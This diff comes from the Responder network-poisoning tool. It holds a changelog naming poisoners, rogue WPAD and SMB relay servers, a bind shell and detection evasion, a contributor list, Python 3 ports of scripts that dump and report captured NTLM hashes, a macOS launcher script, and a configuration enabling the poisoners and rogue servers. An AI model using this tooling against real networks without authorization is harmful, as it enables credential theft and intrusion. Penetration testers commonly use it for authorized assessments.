+- Removed logs folder. ([5d83778](https://github.com/lgandx/Responder/commit/5d83778ac7caba920874dc49f7523c6ef80b6d7b) by lgandx).
+
+## [v2.3.2.4](https://github.com/lgandx/Responder/releases/tag/v2.3.2.4) - 2016-09-12
+
+<small>[Compare with v2.3.2.3](https://github.com/lgandx/Responder/compare/v2.3.2.3...v2.3.2.4)</small>
+
+## [v2.3.2.3](https://github.com/lgandx/Responder/releases/tag/v2.3.2.3) - 2016-09-12
+
+<small>[Compare with v2.3.2.2](https://github.com/lgandx/Responder/compare/v2.3.2.2...v2.3.2.3)</small>
+
+### Added
+
+- Added new option in Responder.conf. Capture multiple hashes from the same client. Default is On. ([35d933d](https://github.com/lgandx/Responder/commit/35d933d5964df607ec714ced93e4cb197ff2bfe7) by lgandx).
+
+## [v2.3.2.2](https://github.com/lgandx/Responder/releases/tag/v2.3.2.2) - 2016-09-12
+
+<small>[Compare with v2.3.2.1](https://github.com/lgandx/Responder/compare/v2.3.2.1...v2.3.2.2)</small>
+
+### Added
+
+- Added support for webdav, auto credz. ([ad9ce6e](https://github.com/lgandx/Responder/commit/ad9ce6e659ffd9dd31714260f906c8de02223398) by lgandx).
+- Added option -e, specify an external IP address to redirect poisoned traffic to. ([04c270f](https://github.com/lgandx/Responder/commit/04c270f6b75cd8eb833cca3b71965450d925e6ac) by lgandx).
+
+### Removed
+
+- removed debug info ([3e2e375](https://github.com/lgandx/Responder/commit/3e2e375987ce2ae03e6a88ffadabb13823ba859c) by lgandx).
+
+## [v2.3.2.1](https://github.com/lgandx/Responder/releases/tag/v2.3.2.1) - 2016-09-11
+
+<small>[Compare with v2.3.2](https://github.com/lgandx/Responder/compare/v2.3.2...v2.3.2.1)</small>
+
+## [v2.3.2](https://github.com/lgandx/Responder/releases/tag/v2.3.2) - 2016-09-11
+
+<small>[Compare with v2.3.1](https://github.com/lgandx/Responder/compare/v2.3.1...v2.3.2)</small>
+
+### Added
+
+- Added proxy auth server + various fixes and improvements ([82fe64d](https://github.com/lgandx/Responder/commit/82fe64dfd988321cbc1a8cb3d8f01caa38f4193e) by lgandx).
+- Added current date for all HTTP headers, avoiding easy detection ([ecd62c3](https://github.com/lgandx/Responder/commit/ecd62c322f48eadb235312ebb1e57375600ef0f1) by lgandx).
+
+### Removed
+
+- Removed useless HTTP headers ([881dae5](https://github.com/lgandx/Responder/commit/881dae59cf3c95047d82b34208f57f94b3e85b04) by lgandx).
+
+## [v2.3.1](https://github.com/lgandx/Responder/releases/tag/v2.3.1) - 2016-09-09
+
+<small>[Compare with v2.3.0](https://github.com/lgandx/Responder/compare/v2.3.0...v2.3.1)</small>
+
+### Added
+
+- Added SMBv2 support enabled by default. ([85d7974](https://github.com/lgandx/Responder/commit/85d7974513a9b6378ed4c0c07a7dd640c27ead9b) by lgandx).
+- added new option, for Config-Responder.log file. ([a9c2b29](https://github.com/lgandx/Responder/commit/a9c2b297c6027030e3f83c7626fff6f66d5a4f1b) by lgaffie).
+- Add compatability with newer net-tools ifconfig. ([e19e349](https://github.com/lgandx/Responder/commit/e19e34997e68a2f567d04d0c013b7870530b7bfd) by Hank Leininger).
+- Add HTTP Referer logging ([16e6464](https://github.com/lgandx/Responder/commit/16e6464748d3497943a9d96848ead9058dc0f7e9) by Hubert Seiwert).
+- Added recent Windows versions. ([6eca29d](https://github.com/lgandx/Responder/commit/6eca29d08cdd0d259760667da0c41e76d2cd2693) by Jim Shaver).
+- Added: Support for OSx ([59e48e8](https://github.com/lgandx/Responder/commit/59e48e80dd6153f83899413c2fc71a46367d4abf) by lgandx).
+
+### Fixed
+
+- Fixed colors in log files ([d9258e2](https://github.com/lgandx/Responder/commit/d9258e2dd80ab1d62767377250c76bf5c9f2a50d) by lgaffie).
+- Fixed the regexes for Authorization: headers. ([a81a9a3](https://github.com/lgandx/Responder/commit/a81a9a31e4dbef2890fbf51830b6a9374d6a8f8a) by Hank Leininger).
+- Fix Windows 10 support. ([a84b351](https://github.com/lgandx/Responder/commit/a84b3513e1fdd47025ceaa743ce0f506f162640b) by ValdikSS).
+- Fixed color bug in Analyze mode ([04c841d](https://github.com/lgandx/Responder/commit/04c841d34e0d32970f08ae91ad0f931b1b90d6ab) by lgandx).
+- fixed minor bug ([6f8652c](https://github.com/lgandx/Responder/commit/6f8652c0fccfe83078254d7b38cb9fd517a6bf42) by lgandx).
+- Fixed Icmp-Redirect.. ([df63c1f](https://github.com/lgandx/Responder/commit/df63c1fc138d1682a86bc2114a5352ae897865c6) by lgandx).
+- Fixed some tools and +x on some executables ([8171a96](https://github.com/lgandx/Responder/commit/8171a96b9eaac3cd25ef18e8ec8b303c5877f4d0) by lgandx).
+- Fix generation of HTTP response in HTTP proxy ([b2830e0](https://github.com/lgandx/Responder/commit/b2830e0a4f46f62db4d34b3e8f93ea505be32000) by Antonio Herraiz).
+- Fix misspelling of poisoners ([6edc01d](https://github.com/lgandx/Responder/commit/6edc01d8511189489e4b5fd9873f25712920565c) by IMcPwn).
+
+### Changed
+
+- change IsOSX to utils.IsOsX. Fixes #89 ([08c3a90](https://github.com/lgandx/Responder/commit/08c3a90b400d0aff307dd43ff4cd6f01ca71a6cb) by Jared Haight).
+- Changed email address ([f5a8bf0](https://github.com/lgandx/Responder/commit/f5a8bf0650bc088b6ef5ae7432f2baef0d52852c) by lgandx).
+- Changed connection to SQlite db to support different encoded charsets ([0fec40c](https://github.com/lgandx/Responder/commit/0fec40c3b4c621ee21a88906e77c6ea7a56cb8a9) by Yannick Méheut).
+- Changed comment to be more clear about what is being done when logging ([08535e5](https://github.com/lgandx/Responder/commit/08535e55391d762be4259a1fada330ef3f0ac134) by Yannick Méheut).
+
+### Removed
+
+- Removed the config dump in Responder-Session.log. New file gets created in logs, with host network config such as dns, routes, ifconfig and config dump ([a765a8f](https://github.com/lgandx/Responder/commit/a765a8f0949de37940364d0a228aff72c0701aa0) by lgaffie).
+
+## [v2.3.0](https://github.com/lgandx/Responder/releases/tag/v2.3.0) - 2015-09-11
+
+<small>[Compare with v2.1.4](https://github.com/lgandx/Responder/compare/v2.1.4...v2.3.0)</small>
+
+### Added
+
+- Added support for Samba4 clients ([ee033e0](https://github.com/lgandx/Responder/commit/ee033e0c7f28a0584c8ebcb2c31fe949581f0022) by lgandx).
+- Added support for upstream proxies for the rogue WPAD server ([f4bd612](https://github.com/lgandx/Responder/commit/f4bd612e083698fd94308fd2fd15ba7d8d289fd8) by jrmdev).
+
+### Fixed
+
+- Fixed Harsh Parser variable typo ([5ab431a](https://github.com/lgandx/Responder/commit/5ab431a4fe24a2ba4666b9c51ad59a0bb8a0053d) by lgandx).
+- fixed var name ([62ed8f0](https://github.com/lgandx/Responder/commit/62ed8f00626a2ad0fbbfb845e808d77938f4513a) by byt3bl33d3r).
+- Fixes MDNS Name parsing error ([3261288](https://github.com/lgandx/Responder/commit/3261288c82fee415dd8e1ba64b80596ef97da490) by byt3bl33d3r).
+- Fixed FTP module. ([75664a4](https://github.com/lgandx/Responder/commit/75664a4f37feb897be52480223cd1633d322ede8) by jrmdev).
+- Fixing a bug in HTTP proxy, was calling recv() too many times ([ddaa9f8](https://github.com/lgandx/Responder/commit/ddaa9f87674dc8ac3f9104196f2f92cdec130682) by lanjelot).
+
+### Changed
+
+- changed operand ([cb9c2c8](https://github.com/lgandx/Responder/commit/cb9c2c8b97761cc5e00051efd74c9c3fdaf5762d) by byt3bl33d3r).
+
+## [v2.1.4](https://github.com/lgandx/Responder/releases/tag/v2.1.4) - 2014-12-06
+
+<small>[Compare with v2.1.3](https://github.com/lgandx/Responder/compare/v2.1.3...v2.1.4)</small>
+
+### Added
+
+- Added: FindSMB2UPTime script. Find when is the last time a >= 2008 server was updated. ([7a95ef1](https://github.com/lgandx/Responder/commit/7a95ef1474d3cea88680f359581aa89a4e9c30f5) by lgandx).
+
+## [v2.1.3](https://github.com/lgandx/Responder/releases/tag/v2.1.3) - 2014-11-27
+
+<small>[Compare with v2.1.2](https://github.com/lgandx/Responder/compare/v2.1.2...v2.1.3)</small>
+
+### Added
+
+- Added: DontRespondToName and DontRespondTo; NAC/IPS detection evasion ([36ef78f](https://github.com/lgandx/Responder/commit/36ef78f85aea5db33f37a6d1d73bf3bb7f82336f) by lgandx).
+- Added --version and kost's fix for /etc/resolv.conf empty lines parsing. ([c05bdfc](https://github.com/lgandx/Responder/commit/c05bdfce17234b216b408080d9aba5db443de507) by lgandx).
+
+## [v2.1.2](https://github.com/lgandx/Responder/releases/tag/v2.1.2) - 2014-08-26
+
+<small>[Compare with v2.1.0](https://github.com/lgandx/Responder/compare/v2.1.0...v2.1.2)</small>
+
+### Added
+
+- Added: Log command line in Responder-Session.log. ([f69e93c](https://github.com/lgandx/Responder/commit/f69e93c02e81a83309d3863f6d5680b36378a16b) by lgandx).
+
+### Fixed
+
+- Fixed serve-always and serve-exe with the new WPAD server. ([cf7b477](https://github.com/lgandx/Responder/commit/cf7b4771caf335a1a283fae08923c413acae3343) by lgandx).
+
+## [v2.1.0](https://github.com/lgandx/Responder/releases/tag/v2.1.0) - 2014-08-16
+
+<small>[Compare with v2.0.9](https://github.com/lgandx/Responder/compare/v2.0.9...v2.1.0)</small>
+
+### Fixed
+
+- fixed: identation. ([5c9fec9](https://github.com/lgandx/Responder/commit/5c9fec923c8cb77f00466db6192b1ecb8980bdcf) by lgandx).
+
+## [v2.0.9](https://github.com/lgandx/Responder/releases/tag/v2.0.9) - 2014-05-28
+
+<small>[Compare with v2.0.8](https://github.com/lgandx/Responder/compare/v2.0.8...v2.0.9)</small>
+
+### Fixed
+
+- Fixed high cpu usage in some specific cases ([4558861](https://github.com/lgandx/Responder/commit/4558861ce2dd56c0e4c5157437c8726a26e382c5) by lgandx).
+
+### Removed
+
+- Removed: old style options. Just use -r instead of -r On ([a21aaf7](https://github.com/lgandx/Responder/commit/a21aaf7987e26eee5455d68cd76ff56b5466b7f2) by lgandx).
+
+## [v2.0.8](https://github.com/lgandx/Responder/releases/tag/v2.0.8) - 2014-04-22
+
+<small>[Compare with v2.0.7](https://github.com/lgandx/Responder/compare/v2.0.7...v2.0.8)</small>
+
+### Added
+
+- Added: in-scope target,  windows >= Vista support (-R) and  unicast answers only. ([2e4ed61](https://github.com/lgandx/Responder/commit/2e4ed61bba2df61a1e1165b466a369639c425955) by lgandx).
+
+## [v2.0.7](https://github.com/lgandx/Responder/releases/tag/v2.0.7) - 2014-04-16
+
+<small>[Compare with v2.0.6](https://github.com/lgandx/Responder/compare/v2.0.6...v2.0.7)</small>
+
+### Added
+
+- Added: in-scope llmnr/nbt-ns name option ([1c79bed](https://github.com/lgandx/Responder/commit/1c79bedac9083992ba019ff7134cdb3c718a6f15) by lgandx).
+- Added: Kerberos server and -d cli option. ([dcede0f](https://github.com/lgandx/Responder/commit/dcede0fdf5e060e77fc51fbad2da3dbbff8edf8d) by lgandx).
+
+## [v2.0.6](https://github.com/lgandx/Responder/releases/tag/v2.0.6) - 2014-04-01
+
+<small>[Compare with v2.0.5](https://github.com/lgandx/Responder/compare/v2.0.5...v2.0.6)</small>
+
+### Fixed
+
+- Fixed [Enter] key issue ([c97a13c](https://github.com/lgandx/Responder/commit/c97a13c1bdb79b4dcdf43f889fdd586c3c39b893) by lgandx).
+
+## [v2.0.5](https://github.com/lgandx/Responder/releases/tag/v2.0.5) - 2014-03-22
+
+<small>[Compare with v2.0.4](https://github.com/lgandx/Responder/compare/v2.0.4...v2.0.5)</small>
+
+### Added
+
+- Added: In-scope IP handling for MDNS ([b14ff0b](https://github.com/lgandx/Responder/commit/b14ff0b36a100736f293ddbd8bbe1c538a370347) by lgandx).
+
+## [v2.0.4](https://github.com/lgandx/Responder/releases/tag/v2.0.4) - 2014-03-22
+
+<small>[Compare with v2.0.3](https://github.com/lgandx/Responder/compare/v2.0.3...v2.0.4)</small>
+
+### Added
+
+- Added: MDNS Poisoner ([90479ad](https://github.com/lgandx/Responder/commit/90479adcca066602885ea2bfec32953ce71d6977) by lgandx).
+
+## [v2.0.3](https://github.com/lgandx/Responder/releases/tag/v2.0.3) - 2014-03-21
+
+<small>[Compare with v2.0.2](https://github.com/lgandx/Responder/compare/v2.0.2...v2.0.3)</small>
+
+### Fixed
+
+- fix: Bind to interface bug. ([a1a4f46](https://github.com/lgandx/Responder/commit/a1a4f46c7ba8861ff71c1ea2045a72acf2c829bd) by lgandx).
+
+## [v2.0.2](https://github.com/lgandx/Responder/releases/tag/v2.0.2) - 2014-02-06
+
+<small>[Compare with v2.0.1](https://github.com/lgandx/Responder/compare/v2.0.1...v2.0.2)</small>
+
+### Added
+
+- Added: Analyze mode; Lanman Domain/SQL/Workstation passive discovery. ([2c9273e](https://github.com/lgandx/Responder/commit/2c9273eb2ca8d5080ff81273f602547fe649c259) by lgandx).
+
+## [v2.0.1](https://github.com/lgandx/Responder/releases/tag/v2.0.1) - 2014-01-30
+
+<small>[Compare with first commit](https://github.com/lgandx/Responder/compare/e821133708098c74497a3f9b0387a3ad048d5a48...v2.0.1)</small>
+
+### Added
+
+- Added: Analyze ICMP Redirect plausibility on current subnet. ([06df704](https://github.com/lgandx/Responder/commit/06df704960c556e3c2261a52827d55eb7b4ed0d4) by lgandx).
+- Added: Analyze stealth mode. See all traffic, but dont answer (-A cli). Minor bugs also fixed. ([9bb2f81](https://github.com/lgandx/Responder/commit/9bb2f81044cd94f36f54c8daf7f1183bc761bb24) by lgandx).
+- Added: -F command line switch to force authentication on PAC file retrieval. Default is Off ([3f48c11](https://github.com/lgandx/Responder/commit/3f48c114d5e713bfe68bef1717e18d3c266f358e) by lgandx).
+- Added: IMAP module and enhanced wpad. ([af60de9](https://github.com/lgandx/Responder/commit/af60de95679f20eca4765b1450f80c48fbef689c) by lgandx).
+- Added: SMTP PLAIN/LOGIN module ([6828f1b](https://github.com/lgandx/Responder/commit/6828f1b11ebfc0fc25a8fd00e8f373f3adfb7fc6) by lgandx).
+- Added: POP3 module. ([f48ea3f](https://github.com/lgandx/Responder/commit/f48ea3f4b644c3eb25c63d402c6d30fcd29be529) by lgandx).
+- Added: MSSQL Plaintext module ([4c3a494](https://github.com/lgandx/Responder/commit/4c3a494c86b7a95cf2c43a71bac182f231bf71cb) by lgandx).
+- Added: SMBRelay module ([4dd9d8c](https://github.com/lgandx/Responder/commit/4dd9d8c1df3717ed928e73083c30e21aa5eaf8b4) by lgandx).
+- added: Command switch -v for verbose mode. Responder is now less verbose. ([46b98a6](https://github.com/lgandx/Responder/commit/46b98a616d540ae618198784d0775e687371858e) by lgandx).
+- Added support for .pac file requests. ([6b7e5b6](https://github.com/lgandx/Responder/commit/6b7e5b6441c7fdf19a163b8efb6fd588ccfee8ae) by lgandx).
+- Added: print HTTP URL, POST data requested prior auth ([f616718](https://github.com/lgandx/Responder/commit/f6167183e046d2759ab6b885dd2f94bb2902c564) by lgandx).
+- Added command switch -I. This option override Responder.conf Bind_to setting ([68de4ac](https://github.com/lgandx/Responder/commit/68de4ac26ec34bbf24524abb0c0b11ae34aa27a3) by lgandx).
+- Added: in-scope only target. See Responder.conf. ([0465bd6](https://github.com/lgandx/Responder/commit/0465bd604d7cc22ef2c97f938d8564677030e5bd) by lgandx).
+- Added: Fake access denied html page ([9b608aa](https://github.com/lgandx/Responder/commit/9b608aad30529e2bfea4d7c6e99343df0ba2d9d0) by lgandx).
+- Added: Configuration file, removed several cli options and several fixes. ([95eed09](https://github.com/lgandx/Responder/commit/95eed099424568d4c67402f12a5de5d9d72c3041) by lgandx).
+- Added: Configuration file for Responder ([d573102](https://github.com/lgandx/Responder/commit/d57310273df524b99d17c97b49ee35eb3aec7b52) by lgandx).
+- Added: Bind shell listening on port 140, use it with -e or -exe option if needed ([1079de0](https://github.com/lgandx/Responder/commit/1079de052b7cc7c6caeb80e6ee081568ff359317) by Lgandx).
+- Added: Ability to serve whatever kind of file via HTTP and WPAD There's now 3 new options. ([a8c2952](https://github.com/lgandx/Responder/commit/a8c29522db3555f7733a80d29271b3229e1149c6) by Lgandx).
+- added -I option to bind all sockets to a specific ip (eg: listen only on eth0) ([d5088b2](https://github.com/lgandx/Responder/commit/d5088b24ee3d8bead640b37480be57fe564e70b5) by Lgandx).
+- added: HTTP auth forward to SMB. This is useful for SMB Relay or LM downgrade from HTTP NTLM ESS to SMB LM. ([0fcaa68](https://github.com/lgandx/Responder/commit/0fcaa68c074e496edb2164ca35659ff636b5a361) by Lgandx).
+- added automatic poisoning mode when a primary and a secondary DNS is specified. ([ccbbbe3](https://github.com/lgandx/Responder/commit/ccbbbe34535c12b664a39f5a99f98c1da79ca5a6) by Lgandx).
+- Added HTTPS module. ([9250281](https://github.com/lgandx/Responder/commit/92502814aa3becdd064f0bfb160af826adb42f60) by Lgandx).
+- Added support for LM hash downgrade. Default still NTLMSSP. ([09f8f72](https://github.com/lgandx/Responder/commit/09f8f7230d66cb35e1e6bed9fb2c9133ad5cc415) by Lgandx).
+- Added: Client ip is now part of the cookie filename ([2718f9c](https://github.com/lgandx/Responder/commit/2718f9c51310e18e91d6d90c86657bdd72889f2a) by Lgandx).
+- Added a folder for storing HTTP cookies files ([d1a14e2](https://github.com/lgandx/Responder/commit/d1a14e2f27d856ca1551232502835d6cddb3602d) by Lgandx).
+- Added WPAD transparent proxy ([9f1c3bc](https://github.com/lgandx/Responder/commit/9f1c3bcba32c6feb008a39ece688522dcd9e757f) by Lgandx).
+
+### Fixed
+
+- Fixed WPAD cookie capture ([afe2b63](https://github.com/lgandx/Responder/commit/afe2b63c6a556a6da97e7ac89c96f89276d521c3) by lgandx).
+- Fix: Command line switch typo ([4fb4233](https://github.com/lgandx/Responder/commit/4fb4233424273849085781225298de39b6c9c098) by lgandx).
+- Fixed minor bugs ([f8a16e2](https://github.com/lgandx/Responder/commit/f8a16e28ee15a3af91542269e5b1ec9c69ea3d75) by Lgandx).
+- Fixed duplicate entry in hash file for machine accounts ([4112b1c](https://github.com/lgandx/Responder/commit/4112b1cd5d06f021dcc145f32d29b53d4cb8d82a) by Lgandx).
+- fix for anonymous NTLM connection for LDAP server ([1c47e7f](https://github.com/lgandx/Responder/commit/1c47e7fcb112d0efdb509e56a1b08d557eb9f375) by Lgandx).
+
+### Changed
+
+- Changed WPAD to Off by default. Use command line -w On to enable. ([bf2fdf0](https://github.com/lgandx/Responder/commit/bf2fdf083cdadf81747f87eb138a474911928b77) by lgandx).
+- changed .txt to no extension. ([5f7bfa8](https://github.com/lgandx/Responder/commit/5f7bfa8cbe75d0c7fd24c8a83c44a5c3b02717a4) by lgandx).
+- Changed Windows =< 5.2 documentation to XP/2003 and earlier for clarification ([56dd7b8](https://github.com/lgandx/Responder/commit/56dd7b828cf85b88073e88a8b4409f7dae791d49) by Garret Picchioni).
+
+### Removed
+
+- Removed bind to interface support for OsX. Responder for OsX can only listen on all interfaces. ([dbfdc27](https://github.com/lgandx/Responder/commit/dbfdc2783156cfeede5114735ae018a925b3fa78) by lgandx).
+

Contributors

@@ -0,0 +1,76 @@
+Commits | user
+15  @jrmdev
+7   @nobbd
+6   @ValdikSS
+6   @also-here
+5   @HexPandaa
+5   @exploide
+5   @jvoisin
+4   @Clément Notin
+4   @Shutdown
+4   @Yannick Méheut
+3   @Hank Leininger
+3   @brightio
+3   @byt3bl33d3r
+3   @myst404
+3   @skelsec
+2   @Alexandre ZANNI
+2   @Crypt0-M3lon
+2   @Laban Sköllermark
+2   @Matthew Daley
+2   @Pixis
+2   @Rob Fuller
+2   @ThePirateWhoSmellsOfSunflowers
+2   @Vincent Yiu
+2   @requin
+1   @Andrii Nechytailov
+1   @Antonio Herraiz
+1   @Chris Maddalena
+1   @Euan
+1   @Garret Picchioni
+1   @Gifts
+1   @Gustaf Blomqvist
+1   @Hubert Seiwert
+1   @IMcPwn
+1   @Jared Haight
+1   @Jim Shaver
+1   @Khiem Doan
+1   @Leon Jacobs
+1   @Lionel PRAT
+1   @Markus
+1   @MatToufoutu
+1   @Matt
+1   @Matt Andreko
+1   @Matt Kelly
+1   @Nikos Vassakis
+1   @OJ
+1   @Paul A
+1   @Randy Ramos
+1   @SAERXCIT
+1   @Sagar-Jangam
+1   @Sans23
+1   @Sophie Brun
+1   @Stephen Shkardoon
+1   @Syntricks
+1   @Timon Hackenjos
+1   @Tom Aviv
+1   @Ziga P
+1   @cweedon
+1   @deltronzero
+1   @f3rn0s
+1   @jackassplus
+1   @jb
+1   @kevintellier
+1   @kitchung
+1   @klemou
+1   @lanjelot
+1   @nickyb
+1   @nodauf
+1   @nop5L3D
+1   @pixis
+1   @ravenium
+1   @soa
+1   @steven
+1   @thejosko
+1   @trustedsec
+

DumpHash.py

@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
@@ -28,22 +28,28 @@ def GetResponderCompleteNTLMv2Hash(cursor):
      res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v2%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
      Output = ""
      for row in res.fetchall():
-         Output += '{0}'.format(row[0])+'\n'
+         if "$" in row[0]:
+             pass
+         else:
+            Output += '{0}'.format(row[0])+'\n'
      return Output
 
 def GetResponderCompleteNTLMv1Hash(cursor):
      res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v1%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
      Output = ""
      for row in res.fetchall():
-         Output += '{0}'.format(row[0])+'\n'
+         if "$" in row[0]:
+             pass
+         else:
+            Output += '{0}'.format(row[0])+'\n'
      return Output
 
 cursor = DbConnect()
-print "Dumping NTLMV2 hashes:"
+print("Dumping NTLMV2 hashes:")
 v2 = GetResponderCompleteNTLMv2Hash(cursor)
 DumpHashToFile("DumpNTLMv2.txt", v2)
-print v2
-print "\nDumping NTLMv1 hashes:"
+print(v2)
+print("\nDumping NTLMv1 hashes:")
 v1 = GetResponderCompleteNTLMv1Hash(cursor)
 DumpHashToFile("DumpNTLMv1.txt", v1)
-print v1
+print(v1)

OSX_launcher.sh

@@ -0,0 +1,39 @@
+# responder launcher
+# set -x
+# Usage:
+# ./responderd /path/to/responder interface responder_options
+
+# port list
+# Everything -> tcp:21 tcp:80 tcp:25 udp:53 tcp:88 udp:137 udp:138 tcp:139 tcp:143 tcp:443 tcp:445 tcp:110 tcp:389 tcp:1433 tcp:3141 udp:5353 udp:5355
+PORT_LIST=(tcp:21 udp:53 tcp:88 udp:137 udp:138 tcp:139 tcp:143 tcp:445 tcp:389 tcp:1433 udp:5353 udp:5355)
+SVC_LIST=()
+
+# check for running processes and kill them one by one
+# looping over everything rather than doing a mass kill because some processes may be 
+# children and may not need to be killed
+for port in ${PORT_LIST[@]}; do
+	PROC=$(lsof +c 0 -i $port | grep -m 1 -v 'launchd\|COMMAND' | cut -d' ' -f1)
+	if [ -n "$PROC" ]; then
+        AGENT=$(sudo launchctl list | grep -m 1 $PROC | cut -f3 | sed 's/.reloaded//g')
+
+        # load/unload are listed as "legacy" in 10.10+ may need to change this someday
+		echo "Stopping $PROC"
+        sudo launchctl unload -w /System/Library/LaunchDaemons/$AGENT.plist
+
+        # append killed service to new array
+        SVC_LIST+=($AGENT)
+	fi
+done
+
+# get IP address
+IP=$(ifconfig $2 | grep 'inet ' | cut -d' ' -f2)
+
+# Launch responder
+python $1 $3 -i $IP
+
+# restore stopped services
+for agent in ${SVC_LIST[@]}; do
+	echo "Starting $agent"
+		sudo launchctl load -w /System/Library/LaunchDaemons/$agent.plist
+
+done

Report.py

@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
 # email: laurent.gaffie@gmail.com
@@ -31,6 +31,10 @@ def DbConnect():
     cursor = sqlite3.connect("./Responder.db")
     return cursor
 
+def FingerDbConnect():
+    cursor = sqlite3.connect("./tools/RunFinger.db")
+    return cursor
+    
 def GetResponderData(cursor):
      res = cursor.execute("SELECT * FROM Responder")
      for row in res.fetchall():
@@ -39,7 +43,7 @@ def GetResponderData(cursor):
 def GetResponderUsernamesStatistic(cursor):
      res = cursor.execute("SELECT COUNT(DISTINCT UPPER(user)) FROM Responder")
      for row in res.fetchall():
-         print color('[+] In total {0} unique user accounts were captured.'.format(row[0]), code = 2, modifier = 1)
+         print(color('\n[+] In total {0} unique user accounts were captured.'.format(row[0]), code = 2, modifier = 1))
 
 def GetResponderUsernames(cursor):
      res = cursor.execute("SELECT DISTINCT user FROM Responder")
@@ -57,16 +61,33 @@ def GetResponderCompleteHash(cursor):
      for row in res.fetchall():
          print('{0}'.format(row[0]))
 
+def GetUniqueLookupsIP(cursor):
+     res = cursor.execute("SELECT Poisoner, SentToIp FROM Poisoned WHERE Poisoner in (SELECT DISTINCT UPPER(Poisoner) FROM Poisoned)")
+     for row in res.fetchall():
+         if 'fe80::' in row[1]:
+             pass
+         else: 
+             print('Protocol: {0}, IP: {1}'.format(row[0], row[1]))
+
 def GetUniqueLookups(cursor):
      res = cursor.execute("SELECT * FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned) ORDER BY SentToIp, Poisoner")
      for row in res.fetchall():
          print('IP: {0}, Protocol: {1}, Looking for name: {2}'.format(row[2], row[1], row[3]))
 
+def GetUniqueDHCP(cursor):
+     res = cursor.execute("SELECT * FROM DHCP WHERE MAC in (SELECT DISTINCT UPPER(MAC) FROM DHCP)")
+     for row in res.fetchall():
+         print('MAC: {0}, IP: {1}, RequestedIP: {2}'.format(row[1], row[2], row[3]))
+
+def GetRunFinger(cursor):
+     res = cursor.execute("SELECT * FROM RunFinger WHERE Host in (SELECT DISTINCT Host FROM RunFinger)")
+     for row in res.fetchall():
+         print(("{},['{}', Os:'{}', Build:'{}', Domain:'{}', Bootime:'{}', Signing:'{}', Null Session: '{}', RDP:'{}', SMB1:'{}', MSSQL:'{}']".format(row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9], row[10], row[11])))
 
 def GetStatisticUniqueLookups(cursor):
      res = cursor.execute("SELECT COUNT(*) FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned)")
      for row in res.fetchall():
-         print color('[+] In total {0} unique queries were poisoned.'.format(row[0]), code = 2, modifier = 1)
+         print(color('\n[+] In total {0} unique queries were poisoned.'.format(row[0]), code = 2, modifier = 1))
 
 
 def SavePoisonersToDb(result):
@@ -82,14 +103,25 @@ def SaveToDb(result):
 			result[k] = ''
 
 cursor = DbConnect()
-print color("[+] Generating report...", code = 3, modifier = 1)
-print color("[+] Unique lookups ordered by IP:", code = 2, modifier = 1)
+print(color("[+] Generating report...\n", code = 3, modifier = 1))
+
+print(color("[+] DHCP Query Poisoned:", code = 2, modifier = 1))
+GetUniqueDHCP(cursor)
+print(color("\n[+] Unique IP using legacy protocols:", code = 2, modifier = 1))
+GetUniqueLookupsIP(cursor)
+print(color("\n[+] Unique lookups ordered by IP:", code = 2, modifier = 1))
 GetUniqueLookups(cursor)
 GetStatisticUniqueLookups(cursor)
-print color("\n[+] Extracting captured usernames:", code = 2, modifier = 1)
+print(color("\n[+] Extracting captured usernames:", code = 2, modifier = 1))
 GetResponderUsernames(cursor)
-print color("\n[+] Username details:", code = 2, modifier = 1)
+print(color("\n[+] Username details:", code = 2, modifier = 1))
 GetResponderUsernamesWithDetails(cursor)
 GetResponderUsernamesStatistic(cursor)
-#print color("\n[+] Captured hashes:", code = 2, modifier = 1)
-#GetResponderCompleteHash(cursor)
+print (color("\n[+] RunFinger Scanned Hosts:", code = 2, modifier = 1))
+cursor.close()
+try:
+	cursor = FingerDbConnect()
+	GetRunFinger(cursor)
+except:
+	pass
+print('\n')

Responder.conf

@@ -1,19 +1,34 @@
 [Responder Core]
 
-; Servers to start
-SQL = On
-SMB = On
-Kerberos = On
-FTP = On
-POP = On
-SMTP = On
-IMAP = On
-HTTP = On
-HTTPS = On
-DNS = On
-LDAP = On
+; Poisoners to start
+MDNS  = On
+LLMNR = On
+NBTNS = On
 
-; Custom challenge. 
+#IPv6 conf:
+DHCPv6 = Off
+
+; Servers to start
+SQL      = On
+SMB      = On
+QUIC     = On
+RDP      = On
+Kerberos = On
+FTP      = On
+POP      = On
+SMTP     = On
+IMAP     = On
+HTTP     = On
+HTTPS    = On
+DNS      = On
+LDAP     = On
+DCERPC   = On
+WINRM    = On
+SNMP     = On
+MQTT     = On
+MYSQL    = On 
+
+; Custom challenge.
 ; Use "Random" for generating a random challenge for each requests (Default)
 Challenge = Random
 
@@ -34,21 +49,27 @@ AnalyzeLog = Analyzer-Session.log
 ResponderConfigDump = Config-Responder.log
 
 ; Specific IP Addresses to respond to (default = All)
-; Example: RespondTo = 10.20.1.100-150, 10.20.3.10
+; Example: RespondTo = 10.20.1.100-150, 10.20.3.10, fe80::e059:5c8f:a486:a4ea-a4ef, 2001:db8::8a2e:370:7334
 RespondTo =
 
 ; Specific NBT-NS/LLMNR names to respond to (default = All)
 ; Example: RespondTo = WPAD, DEV, PROD, SQLINT
+;RespondToName = WPAD, DEV, PROD, SQLINT
 RespondToName = 
 
 ; Specific IP Addresses not to respond to (default = None)
-; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10
-DontRespondTo =
+; Hosts with IPv4 and IPv6 addresses must have both addresses included to prevent responding.
+; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10, fe80::e059:5c8f:a486:a4ea-a4ef, 2001:db8::8a2e:370:7334
+DontRespondTo = 
 
 ; Specific NBT-NS/LLMNR names not to respond to (default = None)
-; Example: DontRespondTo = NAC, IPS, IDS
+; Example: DontRespondToName = NAC, IPS, IDS
 DontRespondToName = ISATAP
 
